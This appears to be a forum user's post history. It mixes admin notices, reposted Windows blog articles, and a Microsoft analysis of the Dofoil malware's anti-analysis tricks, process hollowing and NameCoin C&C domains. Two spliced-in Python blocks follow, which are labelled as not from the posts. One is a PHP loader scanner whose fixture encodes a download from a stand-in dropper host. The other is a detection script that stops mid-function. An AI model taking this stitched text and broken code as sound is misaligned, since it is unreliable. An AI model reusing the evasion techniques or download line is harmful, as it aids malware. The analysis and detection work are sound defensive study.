AWS (FPCH Admin)
Everything posted by AWS

  1. I will be doing some long needed upgrades to the network this weekend. Expected downtime will be 2-3 hours while new hardware is installed and configured.
  2. Yes, attach a zip with the file in it. If you scan them, the virus scanner will not pick them up as infected because the files themselves are not a virus. Nothing in them triggers the scanner. Once they download and deliver the payload, then the virus scanners will pick it up.
  3. Open the php files with notepad and search the file for any lines that begin with base64_decode. An example would be something like this:

         eval(base64_decode(long_string_of_random_characters))

     If you find any you can decode the string here to see what it is doing: Base64 Decode and Encode - Online. If you find anything like that then the file is calling to an external server to download malware, most of the time a shell script. More than likely someone else on the server is running software that is being exploited and the server is already compromised. That would explain why files randomly showed up on your site.
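One way to automate the check described in this post, as an added example that is not code from the forum post: a small Python scanner that finds eval(base64_decode(...)) in PHP files, decodes the literal (unwrapping nested layers of the same trick) and flags download or execution indicators in the decoded text so the reviewer can see what the line would do. The indicator list, the scanner's report format and the sample PHP file are constructed for illustration; the sample payload points at a reserved .invalid placeholder domain.

```python
"""Added example (not from the forum post): find eval(base64_decode(...)) in PHP
files and decode the payload so a defender can read what it does."""
import base64
import re
import sys
from pathlib import Path

# eval(base64_decode('...')) / eval(base64_decode("...")), tolerating whitespace
# and line-wrapped base64 inside the quoted literal.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""",
    re.IGNORECASE,
)

# Heuristic indicator strings (assumed list, not from the post): a decoded
# payload that fetches or executes something is the "calls out to an external
# server" case the post describes.
INDICATORS = (
    "http://", "https://", "file_get_contents", "curl_exec", "fsockopen",
    "system(", "exec(", "shell_exec", "passthru", "fwrite(", "unlink(",
)


def decode_layers(literal: str, max_depth: int = 5) -> list:
    """Decode the base64 literal; if the result wraps another
    eval(base64_decode(...)), keep unwrapping up to max_depth layers."""
    layers = []
    current = literal
    for _ in range(max_depth):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", current), validate=True)
            text = raw.decode("utf-8", errors="replace")
        except ValueError as exc:  # binascii.Error is a ValueError subclass
            layers.append(f"<undecodable: {exc}>")
            break
        layers.append(text)
        inner = EVAL_B64.search(text)
        if inner is None:
            break
        current = inner.group(2)
    return layers


def find_encoded_evals(source: str) -> list:
    """Return one finding per eval(base64_decode(...)) occurrence in PHP source."""
    findings = []
    for m in EVAL_B64.finditer(source):
        layers = decode_layers(m.group(2))
        final = layers[-1]
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "layers": len(layers),
            "decoded": final,
            "indicators": [s for s in INDICATORS if s in final],
        })
    return findings


def scan_tree(root: Path) -> dict:
    """Scan every *.php file under root; map relative path -> findings."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = find_encoded_evals(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


def make_sample_loader(payload: str) -> str:
    """Build a constructed test line of the shape the post describes."""
    return "eval(base64_decode('" + base64.b64encode(payload.encode()).decode() + "'));"


# Constructed sample: ordinary theme code with one injected loader line.
SAMPLE_PAYLOAD = 'file_get_contents("http://dropper.example.invalid/payload.txt");'
SAMPLE_PHP = (
    "<?php\n"
    "// constructed theme snippet\n"
    "function greet($name) { return 'Hello ' . htmlspecialchars($name); }\n"
    + make_sample_loader(SAMPLE_PAYLOAD) + "\n"
    "echo greet('world');\n"
)

if __name__ == "__main__":
    # Usage: python scan_php.py /path/to/webroot   (no argument: scan the sample)
    if len(sys.argv) > 1:
        report = scan_tree(Path(sys.argv[1]))
    else:
        report = {"<sample>": find_encoded_evals(SAMPLE_PHP)}
    for name, hits in report.items():
        for h in hits:
            print(f"{name}:{h['line']} layers={h['layers']} indicators={h['indicators']}")
            print("    " + h["decoded"][:200])
```

The regex only catches the literal-in-place form the post shows; a loader that first stores the string in a variable, or that uses gzinflate/str_rot13 around base64_decode, needs additional patterns, so treat a clean scan as "nothing of this shape found", not "file is clean".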
  4. Hello Windows Insiders! Today, we are releasing Windows 10 Insider Preview Build 17643 (RS5) to Windows Insiders who opted in to Skip Ahead.

     What’s new in Build 17643

     Sets + Office = Awesome

     Sets with Office 365 makes it easy to group, recall, and refresh data sources for all your projects. Whether updating your Excel budget each month with stock prices and credit card expenses, incorporating data from multiple reports and websites into a PowerPoint, or managing citations for your book report in Word, Sets with Office 365 helps you get more done, faster. With today’s build – Windows Insiders who are also Office Insiders can try out Sets with Office. You must be an Office 365 subscriber running the latest version of the Office 365 desktop apps for the Sets experience to light up. If you’re not already an Office Insider, you can sign-up here. Additionally, if you’re not an Office 365 subscriber, you can sign-up for a trial here.

     Sets Improvements

     - Sets is now enabled for most desktop (Win32) apps that use a default and non-customized title bar. Apps that customize their title bar will not have Sets (e.g. Paint.exe).
     - If you’ve opened a Microsoft Edge window within Sets, you can now drag that tab around within the set, as well as drop it in another Sets window. Dragging between a Sets window and a standalone Microsoft Edge window does not yet work.

     NOTE: Some Insiders may see Sets disappear temporarily after installing this build. Sets should return in 1-2 days or upon the next reboot of your PC.

     Microsoft Edge Improvements

     Microsoft WebDriver is now a Feature on Demand: We’ve made Microsoft WebDriver a Feature on Demand (FoD) to make it easier to get the right version for your device. You can install WebDriver by turning on Developer Mode, or by going to Settings > Apps > Apps & features > Manage optional features and installing it standalone. This should address one of the biggest pain points we see from customers around binary mismatches, as FoD’s match the build/branch/flavor automatically. This also means that the standalone download will no longer be made available for insiders or future stable versions of Windows, as installation is now built into Windows. Microsoft WebDriver now gets installed to C:\Windows\System32\ and will automatically be on the PATH for the machine once installed. We are now shipping 64-bit Microsoft WebDriver to x64 machines. Note, there is a known issue for x64 machines building in Visual Studio with Selenium, where by default Visual Studio builds 32bit and will only check the C:\Windows\SysWOW64\ folder for PATH variables. To work around this issue, target and build 64bit from Visual Studio. In a future build, we plan to publish both 32bit and 64bit binaries in our FoD for 64bit machines, which should address this issue.

     Data Sense Improvements

     Roaming Usage: Does your device have a SIM? We’ve updated Data Usage Settings to let you know how much data you are using while roaming! The roaming usage info will appear once you start using roaming data. As a reminder, if you’d like to enable or disable roaming altogether, you can find the option under Cellular Settings.

     Magnifier Improvements

     Choose where to keep the mouse cursor: We’ve heard your feedback asking us for a way to keep your mouse centered on the screen in Full-Screen mode, and with this build, we’re making it happen! This new option under Settings > Ease of Access > Magnifier > “Keep your mouse…” > “centered on the screen” enables easier tracking and use of the mouse, especially helpful at higher magnification levels.

     More options for increments: You’ve also been asking for even more control of your zoom level increments, so we’ve taken a moment to add two new increments to the list: 5% and 10%.

     We love feedback! In case you haven’t noticed it already, we have a new Magnifier node in the Feedback Hub under Ease of Access > Magnifier. We’re looking forward to hearing your thoughts about using Magnifier – click this link to open our section in the Feedback Hub.

     General changes, improvements, and fixes for PC

     - We fixed an issue where Reveal would sometimes not appear if you moved your mouse over and off an element repeatedly.
     - We fixed an issue resulting in a noticeable screen flicker when the screen adjusts after rotating your device.
     - We fixed an issue where the spellchecking menu would always appear on the primary monitor on PCs with multiple monitors, rather than the monitor with the red squiggled word.

     Known issues

     - If you open Settings and click on any links to the Microsoft Store or links in tips, Settings will crash. This includes the links to get themes and fonts from the Microsoft Store, as well as the link to Windows Defender.
     - On resuming from sleep, the desktop may be momentarily visible before the Lock screen displays as expected.
     - When Movies & TV user denies access to its videos library (through the “Let Movies & TV access your videos library?” popup window or through Windows privacy settings), Movies & TV crashes when the user navigates to the “Personal” tab.
     - Tiling and cascading windows, including features like “View Side by Side” in Word, will not work for inactive tabs.
     - The Office Visual Basic Editor window will currently be tabbed but is not intended to be in the future.
     - Opening an Office document while the same app has an existing document open may cause an unintended switch to the last active document. This will also happen when closing a sheet in Excel while other sheets remain open.
     - Local files or non-Microsoft cloud files will not be automatically restored and no error message will be provided to alert the user to that fact.
     - Sets UX for Office Win32 desktop apps is not final. The experience will be refined over time based on feedback.
     - The top of some Win32 desktop app windows may appear slightly underneath the tab bar when created maximized. To work around the issue, restore and re-maximize the window.
     - Closing one tab may sometimes minimize the entire set.
     - File Explorer ribbon doesn’t stay pinned open across restart.
     - We’re aware of an issue that causes Narrator to read extra text when invoking Alt + Tab, and we’re working on a fix.
     - Using arrow and Page Up / Page Down keys doesn’t work to scroll webpages in Microsoft Edge. You’ll need to use another input method (mouse, touch, or touchpad).

     No downtime for Hustle-As-A-Service,
     Dona

     The post Announcing Windows 10 Insider Preview Build 17643 for Skip Ahead appeared first on Windows Experience Blog.
  5. This actually was on the news this morning. I think this could be worse than the Facebook stuff.
  6. It does change the first time you post after you upgrade/change browser or switch OS. It doesn't change any of the older posts.
  7. To experience Windows Mixed Reality, you’ll need a few things: a compatible Windows 10 PC, a Windows Mixed Reality headset, and the Windows 10 Fall Creators Update for your PC. For the best experience, you’ll also want a pair of Windows Mixed Reality motion controllers. Now, all set up but not sure where to begin? Here’s a list of ten things for you to try in Windows Mixed Reality right now.

     Personalize your display
     Before you start playing in mixed reality, you’ll want to adjust your headset display for your interpupillary distance (IPD). Since everyone has a different distance between their eyes, it’s important to change your headset’s software settings to match your own IPD for the best image quality and depth accuracy when you play. You can set your custom IPD via Settings > Mixed Reality > Headset display > Calibration.[1]

     Customize your mixed reality home
     The first thing you’ll see when you launch Windows Mixed Reality and put on your headset is your mixed reality home, your home base for discovering specific apps or experiences. Here, you can customize each room to your liking. Open the Start menu to pin your favorite apps to the walls and go to Start > Holograms to add furniture, people, and other holograms to your space.

     Navigate in mixed reality
     There are several ways to get around in mixed reality with your motion controllers. To teleport, point your controller to where you want to go, press either thumbstick forward, and release to instantly land there. To rotate, press your thumbstick left or right, and to back up, press it back. To walk continuously, press either thumbstick straight down and move it in the direction you want to go.

     Use Cortana in mixed reality
     Did you know you can use Cortana while in Windows Mixed Reality? Cortana can help you get around faster with your voice. For example, you can have Cortana adjust the volume in a game, open an app, and even teleport without a controller. Simply start with “Hey Cortana,” to try it now.[2]

     Play games in Steam®VR
     Did you know that in addition to your favorite apps from the Microsoft Store, you can access more than 2,500 amazing games and VR experiences through Steam®VR for Windows Mixed Reality?[3] To get set up, go to aka.ms/steamvr on your PC. Once you’ve launched Steam®VR from your headset, use your motion controllers and press straight down on the left or right thumbstick to open the dashboard and start exploring.

     Watch immersive videos on the web
     Immerse yourself in 360° videos and photos on the web. Get the 360 Viewer extension for Microsoft Edge and put on your headset to browse immersive content from YouTube, Facebook, NYTimes.com, and more.

     Take a closer look in mixed reality
     For a closer look at any open app, you can zoom with your motion controllers. To zoom in, point at an app window with both controllers, pull both triggers, and move your hands apart. To zoom back out, bring your hands together.

     View apps from the best angle
     To perfectly center yourself in front of an app, bounce your teleport off the open app window. To do this, press your thumbstick forward, aim the controller at the app you want to use, and release the thumbstick to land exactly in front of the app window.

     Adjust the floor of your mixed reality home
     Sometimes, the floor of your Windows Mixed Reality home may feel slanted or at the wrong height. If it doesn’t feel comfortable to you, you can change the floor height via Start > Room Adjustment. Just follow the instructions and use the touch pad on your motion controller to get your floor feeling right in no time.

     Share your experience with others
     Use the Mixed Reality Portal to share the fun with friends. From your compatible PC, select the Play button to show the view from your headset on your computer screen.[3]

     These are just a few of the many things you can do in Windows Mixed Reality. To learn more, check out Windows Mixed Reality Support and the mixed reality tips page for even more inspiration.

     [1] In addition, the Samsung HMD Odyssey headset has a mechanical IPD adjuster.
     [2] To experience sound, Cortana and voice dictation, compatible mic-enabled headphones with 3.5mm jack (USB won’t be able to connect to headset) have to be attached, plugged in to the audio jack on the HMD. Consumers may find compatible headphones by looking for the Cortana badge or Circle icon on product packaging and websites.
     [3] PC hardware requirements may vary for available apps, features and content.

     The post Windows 10 Tip: 10 things you can do in Windows Mixed Reality right now appeared first on Windows Experience Blog.
  8. I've been following this. It keeps getting worse as the investigation deepens.
  9. Hello Windows Insiders! Today, we are releasing Windows 10 Insider Preview Build 17639 (RS5) to Windows Insiders who have opted into Skip Ahead.

     What’s new in Build 17639

     The next wave of Sets improvements is here

     What belongs together stays together – we designed Sets to help you keep webpages, documents, files, and apps connected. We’ve been hard at work since our first wave of Sets improvements for RS5, and when you install today’s build you’ll find:

     - Drag and drop app tabs within and between Sets windows is now supported: It works just like it sounds! You can now drag an app tab around within the Set or combine tabbed app windows into Sets. Note: If you open a Microsoft Edge tab outside of a Set, you can’t drag and drop it into a Sets window. Drag and drop for Microsoft Edge web tabs within Sets isn’t supported yet and you may experience a crash if this is attempted.
     - Tabs are now bubbled up in Alt + Tab: Have Photos, Microsoft Edge, and OneNote tabbed together? You can now use Alt + Tab to switch between them. Prefer to only show the primary window in Alt + Tab? There’s a new setting – more on that in just a moment… Note: If you have multiple Microsoft Edge windows in a Set, only the one most recently accessed will be visible in Alt + Tab.
     - Improved Settings for Sets: We’ve updated the Settings for Sets via Settings > System > Multitasking. To start with, Sets now has its own section on this page, and is searchable (try typing “Sets” or “tabs” and it will appear in the dropdown). We’ve also added a setting to control the Alt + Tab behavior mentioned above.
     - File Explorer & Sets Improvements: We’ve heard your feedback – you’d like it to be easier to get two File Explorer windows grouped together, and we’re working on it. To start with, you no longer need to hold CTRL on the new tab page to launch a File Explorer window in a tab (this was a temporary necessity with the last wave). We’ve also added a new keyboard shortcut to open a new tab when a File Explorer window is in focus: Ctrl + T. Remember, you can use Ctrl + N to open a new window, and Ctrl + W to close the window/tab. Finally, we’ve added some new UI for easily opening new tabs and windows in the File Menu. And also, in the context menu when right-clicking on a folder.
     - New context menu options for tabs in Sets: If you right-click on a Sets tab, you’ll discover we’ve added several options for you to leverage, including “close other tabs”, “move to new window”, and “close tabs to the right”.
     - Improvements to Previous Tabs: We’ve done a few things to improve the experience in this space, including:
       - You can now pick and choose which Previous Tabs you want to restore, instead of only being able to restore all tabs. Note: if you use the Sets activity card in Timeline, it will automatically restore all tabs.
       - You can now restore Previous Tabs from any type of activity – whereas with the previous wave of features we only supported restoring tabs when the primary window was a document. When you open a document that previously had tabs, a prompt will appear offering to restore those tabs, and the Previous Tabs button will be in the filled state. For things that aren’t documents, a prompt will not automatically appear, but you’ll know that there are tabs available to restore because the Previous Tabs button will be in the filled state.
       - We added an animation to the experience when there are no Previous Tabs available to be restored.
     - Other Sets improvements and fixes based on your feedback, including:
       - We fixed an issue where the active tab color wouldn’t be visible until you hovered over it.
       - We’ve been working on our polish, and you’ll notice that switching between open tabs is now a lot smoother.
       - We’ve improved the reliability when restoring tabs, fixing some issues where tabs didn’t restore as expected.
       - We fixed an issue where closing a tab in a Set then immediately opening a new tab might result in the window unexpectedly maximizing.

     Here are a few things we’re still working on that aren’t quite finished / resolved yet:

     - File Explorer ribbon doesn’t stay pinned open across restart.
     - It may take some time for the app exclude list in Sets settings to populate the first time it’s opened.
     - Sometimes it takes two tries to bring up an inactive tab from the taskbar.
     - There’s a chance that you may see an unexpected second row of tabs when you open the new tab page.
     - When you launch an app or website from the new tab page, there’s a chance focus will change to a different tab.
     - The “filled” state of the restore icon in Sets will remain filled even though you’ve restored all tabs.
     - We’re aware of an issue that causes Narrator to read extra text when invoking Alt + Tab, and we’re working on a fix.
     - The new tab may sometimes open blank. Closing the tab then opening it again should resolve this issue.

     Coming soon: We’re planning to enable Sets for more Win32 (desktop) apps including Office! In order to try this new experience out with Office, you’ll need to be an Office Insider running the latest Office builds. Sign-up to be an Office Insider today if you aren’t already!

     Bluetooth battery percentage in Settings

     In Bluetooth & other devices Settings, you can now check the battery level of your Bluetooth devices. For Bluetooth devices that support this feature, the battery percentage will update whenever your PC and the device are connected.

     Windows Calculator Improvements

     Windows Calculator has been updated (version 10.1803.711.0) to now correctly calculate square roots for perfect squares (integers that are squares of other integers). Because of the arbitrary precision arithmetic library used by the Calculator app, the square root calculation is an approximation calculated using the Exponential Identity function. Previously, when you would calculate the square root of 4, the result would be 1.99999999999999999989317180305609 which would be rounded to 2 when displayed, because we calculated enough digits to do the rounding correctly. However, as soon as you subtract 2, you would see the remaining digits. After this update, the square root calculation now recognizes perfect squares and correctly returns exactly 2 for the square root of 4.

     General changes, improvements, and fixes for PC

     - We fixed an issue resulting in duplicate entries in Disk Management.
     - We fixed an issue that could result in certain UWP apps silently terminating when minimized.
     - We fixed an issue resulting in certain devices with BitLocker enabled unexpectedly booting into BitLocker recovery in recent flights.
     - We fixed a race condition that could result in the taskbar not autohiding after opening and closing the Start menu while a fullscreen window was visible.
     - We fixed an issue where typing in Start would switch to a blank Cortana screen if Start was open when the PC went to sleep.
     - We fixed an issue when using Arabic as your display language where after using the X to close the touch keyboard in a UWP app text field it might stop coming up automatically in that field.
     - Sometimes having too many choices can be confusing and less is more. That is why this new build has consolidated the places where users can adjust their display brightness by removing the display brightness slider in Control Panel Power Options and the “Display brightness” section under Power Options Advanced Settings. Don’t worry! You can still adjust your display brightness via Settings > System > Display settings, the Action Center, and via keyboard hot keys.

     Known issues

     - If you open Settings and click on any links to the Microsoft Store or links in tips, Settings will crash. This includes the links to get themes and fonts from the Microsoft Store, as well as the link to Windows Defender.
     - On resuming from sleep, the desktop may be momentarily visible before the Lock screen displays as expected.
     - When Movies & TV user denies access to its videos library (through the “Let Movies & TV access your videos library?” popup window or through Windows privacy settings), Movies & TV crashes when the user navigates to the “Personal” tab.

     Recommended Training for Windows Insiders

     We’d like to take this opportunity to highlight some training courses that might interest some Windows Insiders from the Microsoft Professional Program:

     - For Windows Insiders interested in taking the first step in becoming an AI engineer, check out this track here on Artificial Intelligence. You should also check out GeekWire’s article covering the track too!
     - For Windows Insiders interested in diving deeper into the world of IT support, check out this track here.

     Insider Story

     Check out this article on the Windows Insider website to find out how Windows Insider Vincent Pendleton uses Paint 3D as a go-to tool for teaching astronomy!

     No downtime for Hustle-As-A-Service,
     Dona

     The post Announcing Windows 10 Insider Preview Build 17639 for Skip Ahead appeared first on Windows Experience Blog.
  10. Dofoil is a sophisticated threat that attempted to install coin miner malware on hundreds of thousands of computers in March, 2018. In previous blog posts we detailed how behavior monitoring and machine learning in Windows Defender AV protected customers from a massive Dofoil outbreak that we traced back to a software update poisoning campaign several weeks prior. Notably, customers of Windows 10 S, a special Windows 10 configuration that provides streamlined Microsoft-verified security, were not affected by the Dofoil outbreak. In this blog post, we will expound on Dofoils anti-debugging and anti-analysis tactics, and demonstrate how the rich detection libraries of Windows Defender Advanced Threat Protection and Windows Defender Exploit Guard can help during investigation. We found that Dofoil was designed to be elusive to analysis. It checks its environment and stops running in virtual machine environments. It also checks for various analysis tools and kills them right away. This can make malware analysis and assessment challenging. The following diagram shows the multi-stage malware execution process, which includes checks for traits of analysis environments during some stages. Figure 1. Dofoil multi-stage shellcode and payload execution flow The table below describes the purpose of each stage. The first five stages have at least one or two different techniques that can deter dynamic or static malware analysis. STAGES DESCRIPTION 1. Obfuscated wrapper code Anti-heuristics Anti-emulation 2. Bootstrap module Performs self-process hollowing to load the next module 3. Anti-debugging module Performs anti-debugging operation 4. Trojan downloader module Performs system environment checks Performs anti-VM operation Injects itself to explorer.exe through process hollowing 5. Trojan downloader module in explorer.exe Contacts C&C server to download trojan and run it using process hollowing technique 6. 
Payload downloader module in explorer.exe Contacts C&C server to download the main payload 7. Trojan module Steals credentials from various application settings and sends stolen into to the C&C server over HTTP channel 8. CoinMiner.D Mines digital currencies Table 1. Dofoil’s multi-stage modules Initial stages The first three stages (i.e., obfuscated wrapper code, bootstrap module, anti-debugging module) use the following techniques to avoid analysis and identification. ANTI-ANALYSIS TECHNIQUES DESCRIPTION Benign code insertion Inserts a huge benign code block to confuse heuristics and manual inspection Anti-emulation Enumerates an arbitrary registry key (HKEY_CLASSES_ROOT\Interface\{3050F557-98B5-11CF-BB82-00AA00BDCE0B}) and compares the data with an expected value (DispHTMLCurrentStyle) to check if the malware runs inside an emulator Self-process hollowing Uses the process hollowing technique on the current process, making analysis extra difficult due to the altered code mapping Debugger checks Checks for debuggers, and modifies code to crash. This can add additional layer of confusion to researchers, who are bound to investigate the cause of the crashes. It checks for the PEB.BeingDebugged and PEB.NtGlobalFlag fields in the PEB structure. For example, PEB.BeingDebugged is set to 1 and PEB.NtGlobalFlag is set to FLG_HEAP_ENABLE_TAIL_CHECK|FLG_HEAP_ENABLE_FREE_CHECK| FLG_HEAP_VALIDATE_PARAMETERS when a debugger is attached to the process. Table 2. Anti-analysis techniques The first stage contains some benign-looking code before the actual malicious code. This can give the executable a harmless appearance. It can also make the emulation of the code difficult because emulating various API calls that are not present in many malware codes can be challenging. The first-stage code also performs a registry key enumeration to make sure it has the expected value. When all checks are passed, it decodes the second-stage shellcode and runs it on the allocated memory. 
This shellcode un-maps the original main modules memory, and then decodes the third-stage shellcode into that memory this is known as a self-process hollowing technique. Figure 2. Self-modification based on PEB.BeingDebugged value Windows Defender ATPs process tree can help with investigation by exposing these anti-debugging techniques. Figure 3. Windows Defender ATP process tree showing anti-debugging techniques Trojan downloader module The trojan downloader module performs various environment checks, including virtual environment and analysis tool checks, before downloading the payload. ANTI-ANALYSIS TECHNIQUES DESCRIPTION Check module name Checks if the main executable name contains the string “sample” Check volume serial Checks if current volume serial number is 0xCD1A40 or 0x70144646 Check modules Checks the presence of DLLs related to debuggers Check disk-related registry keys Checks the value of the registry key HKLM\System\CurrentControlSet\Services\Disk\Enum against well-known disk name patterns for virtual machines (qemu, virtual, vmware, xen, ffffcce24) Process check Checks running processes and kills those with processes names associated with analysis tools (procexp.exe, procexp64.exe, procmon.exe, procmon64.exe, tcpview.exe, wireshark.exe, processhacker.exe, ollydbg.exe, idaq.exe, x32dbg.exe) Windows class name check Checks the current Windows class names and exits when some well-known names are found (Autoruns, PROCEXPL, PROCMON_WINDOW_CLASS, TCPViewClass, ProcessHacker, OllyDbg, WinDbgFrameClass) Table 3. Anti-analysis techniqueof Dofoil’s trojan downloader module The list of target process names and Windows class names exist in custom checksum form. The checksum algorithm looks like the following: Figure 4. Shift and XOR custom checksum algorithm The purpose of this checksum is to prevent malware researchers from quickly figuring out what analysis tools it detects, making analysis more time-consuming. 
STRING CHECKSUM Autoruns 0x0E5C1C5D PROCEXPL 0x1D421B41 PROCMON_WINDOW_CLASS 0x4B0C105A TCPViewClass 0x1D4F5C43 ProcessHacker 0x571A415E OllyDbg 0x4108161D WinDbgFrameClass 0x054E1905 procexp.exe 0x19195C02 procexp64.exe 0x1C0E041D procmon.exe 0x06185D0B procmon64.exe 0x1D07120A tcpview.exe 0x060B5118 wireshark.exe 0x550E1E0D processhacker.exe 0x51565C47 ollydbg.exe 0x04114C14 x32dbg.exe 0x5F4E5C04 idaq.exe 0x14585A12 Table 4. String checksum table used for process names and Windows class names Process hollowing Dofoil heavily uses the process hollowing technique. Its main target for process hollowing is explorer.exe. The Dofoil shellcode launches a new instance of explorer.exe, allocates shellcode in heap region, and then modifies the entry point code to jump into the shellcode. This way, the malware avoids using CreateRemoteThread API, but can still achieve code injection. Figure 5. Modification of explorer.exe entry point code Windows Defender ATP can detect the process hollowing behavior with advanced memory signals. The following process tree shows that the malware injects itself into explorer.exe using the process hollowing technique. Figure 6. Windows Defender ATP alert process tree showing the first process hollowing When the shellcode downloads another layer of payload, it spawns another explorer.exe to inject the payload into using process hollowing. Windows Defender ATP can save analysis time on these cases by pinpointing the malicious actions, eliminating the need for guessing what these newly spawned Windows system processes are doing. Figure 7. Windows Defender ATP alert process tree showing the second process hollowing The process hollowing behavior can be detected through Exploit protection in Windows Defender Exploit Guard. This can be done by enabling the Export Address Filter (EAF) mitigation against explorer.exe. 
The detection happens when the shellcode goes through the export addresses of the modules to find the export address of the LoadLibraryA and GetProcAddress functions.

Figure 8. Export Address Filter (EAF) event exposed in Event Viewer

Windows Defender Exploit Guard events are also exposed in the Windows Defender ATP portal:

Figure 9. Windows Defender ATP view of the Windows Defender Exploit Guard event

Adding a Windows Defender Exploit Guard EAF audit/block policy to common system processes like explorer.exe, cmd.exe, or verclsid.exe can be useful in finding and blocking process hollowing or process injection techniques commonly used by malware. This policy can impact third-party apps that may behave like shellcode, so we recommend testing Windows Defender Exploit Guard with audit mode enabled before enforcement.

Command-and-control (C&C) and NameCoin domains

Dofoil’s C&C connection is very cautious. The trojan code first tries to connect to well-known web pages and verifies that the malware has a proper and real Internet connection, not a simulated one as in test environments. After it makes sure it has a real Internet connection, the malware makes HTTP connections to the actual C&C servers.

Figure 10. Access to known servers to confirm Internet connectivity

The malware uses NameCoin domain name servers. NameCoin is a decentralized name server system that provides extra privacy backed by blockchain technology. Except for the fact that the DNS client needs to use specific sets of NameCoin DNS servers, the overall operation is very similar to a normal DNS query. Because NameCoin uses blockchain technology, you can query the history of the domain name changes through blocks.

Figure 11. Malicious hostname DNS entry changes over time (Namecoin Block Explorer)

Windows Defender ATP can provide visibility into the malware’s network activities. The following alert process tree shows the malware’s .bit domain resolution activity and, after that, the connections to the resolved C&C servers. You can also view other activities from the executable, for example, its connections to other servers using SMTP ports.

Figure 12. Windows Defender ATP alert process tree showing C&C server connection through NameCoin server name resolution

The Windows Defender ATP advanced hunting feature, which is currently in preview, can be used to hunt down more malware samples that possibly abuse NameCoin servers. For example, the following query will let you view recent connections observed in the network. This can lead to extra insights on other threats that use the same NameCoin servers.

Figure 13. Advanced hunting for other threats using the same NameCoin servers

The purpose of using NameCoin is to prevent easy sinkholing of the domains. Because there are no central authorities on the NameCoin domain name records, it is not possible for the authorities to change the domain record. Also, malware abusing NameCoin servers uses massive numbers of NameCoin DNS servers to make a full shutdown of those servers very difficult.

Conclusion

Dofoil is a very evasive malware. It has various system environment checks and tests Internet connectivity to make sure it runs on real machines, not in analysis environments or virtual machines. This can make the analysis time-consuming and can mislead malware analysis systems. In attacks like the Dofoil outbreak, Windows Defender Advanced Threat Protection (Windows Defender ATP) can help network defenders analyze the timeline from the victim machine and get rich information on process execution flow, C&C connections, and process hollowing activities. Windows Defender ATP can be used as an analysis platform with fine-tuned visibility into system activities when set up in a lab environment. This can save time and resources during malware investigation.

In addition, Windows Defender Exploit Guard can be useful in finding malicious shellcode that traverses export address tables. Windows Defender Exploit Guard can be an excellent tool for finding and blocking malware and exploit activities. Windows Defender Exploit Guard events are surfaced in the Windows Defender ATP portal, which integrates protections from other Microsoft solutions, including Windows Defender AV and Windows Defender Application Guard. This integrated security management experience makes Windows Defender ATP a comprehensive solution for detecting and responding to a wide range of malicious activities across the network.

Windows 10 S, a special configuration of Windows 10, locks down devices against Dofoil and other attacks by working exclusively with apps from the Microsoft Store and using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common malware entry points.

To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.
Matt Oh, Stefan Sellmer, Jonathan Bar Or, Mark Wodrich
Windows Defender ATP Research

Indicators of compromise (IoCs)

Sample hashes for TrojanDownloader:Win32/Dofoil.AB, Trojan:Win32/Dofoil.AB, and Trojan:Win32/CoinMiner.D are listed in the original post.
C&C URLs: hxxp://levashov.bit/15022018/ hxxp://vrubl.bit/15022018/
C&C server: vinik.bit
Related .bit domains (updated in same block as C&C server): henkel.bit makron.bit makronwin.bit
The NameCoin server addresses used by Dofoil are listed in the original post.

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence. Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence. Continue reading...
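The .bit resolution chain in the alert process tree and the "other threats using the same NameCoin servers" hunt, as an added example that is not code from the original post or from Windows Defender ATP: it runs constructed endpoint network events through simple detection logic. The event field names, the corporate resolver list, process names and all addresses (RFC 5737 documentation ranges) are assumptions.

```python
from collections import defaultdict

# Constructed: resolvers that endpoints in this hypothetical network should use.
CORPORATE_RESOLVERS = frozenset({"10.0.0.53", "10.0.1.53"})
SMTP_PORTS = frozenset({25, 465, 587})

# Constructed telemetry (field names are assumptions, not the ATP schema).
# All addresses come from RFC 5737 documentation ranges, not real infrastructure.
SAMPLE_EVENTS = [
    # Hollowed explorer.exe: connectivity check via corporate DNS, then a .bit
    # lookup against a foreign resolver, then the C&C connection and SMTP traffic.
    {"ts": 1, "pid": 4120, "image": "explorer.exe", "kind": "dns",
     "query": "www.bing.com", "remote_ip": "10.0.0.53", "remote_port": 53},
    {"ts": 2, "pid": 4120, "image": "explorer.exe", "kind": "dns",
     "query": "vinik.bit", "remote_ip": "203.0.113.7", "remote_port": 53},
    {"ts": 3, "pid": 4120, "image": "explorer.exe", "kind": "connect",
     "remote_ip": "198.51.100.20", "remote_port": 80},
    {"ts": 4, "pid": 4120, "image": "explorer.exe", "kind": "connect",
     "remote_ip": "198.51.100.21", "remote_port": 25},
    # A second process that only shares the foreign resolver: the pivot case.
    {"ts": 5, "pid": 7001, "image": "svchost.exe", "kind": "dns",
     "query": "update.example.net", "remote_ip": "203.0.113.7", "remote_port": 53},
    # Benign browser traffic through corporate DNS.
    {"ts": 6, "pid": 880, "image": "chrome.exe", "kind": "dns",
     "query": "www.example.org", "remote_ip": "10.0.1.53", "remote_port": 53},
    {"ts": 7, "pid": 880, "image": "chrome.exe", "kind": "connect",
     "remote_ip": "192.0.2.44", "remote_port": 443},
]


def is_bit_domain(name):
    """True for NameCoin names, i.e. anything under the .bit pseudo-TLD."""
    labels = name.lower().rstrip(".").split(".")
    return len(labels) >= 2 and labels[-1] == "bit"


def hunt_namecoin(events, corporate_resolvers=CORPORATE_RESOLVERS):
    """Flag NameCoin-style activity per process.

    Returns (findings, foreign_resolvers): findings maps pid -> sorted reasons;
    foreign_resolvers is the set of DNS servers outside the corporate list, which
    is the pivot for the "other threats using the same NameCoin servers" hunt.
    """
    findings = defaultdict(set)
    foreign_resolvers = set()
    pids_with_bit_lookup = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        pid = ev["pid"]
        if ev["kind"] == "dns":
            # Endpoints should only talk DNS to the corporate resolvers; anything
            # else is a misconfiguration or an alternative root such as NameCoin.
            if ev["remote_port"] == 53 and ev["remote_ip"] not in corporate_resolvers:
                findings[pid].add("dns_to_non_corporate_resolver")
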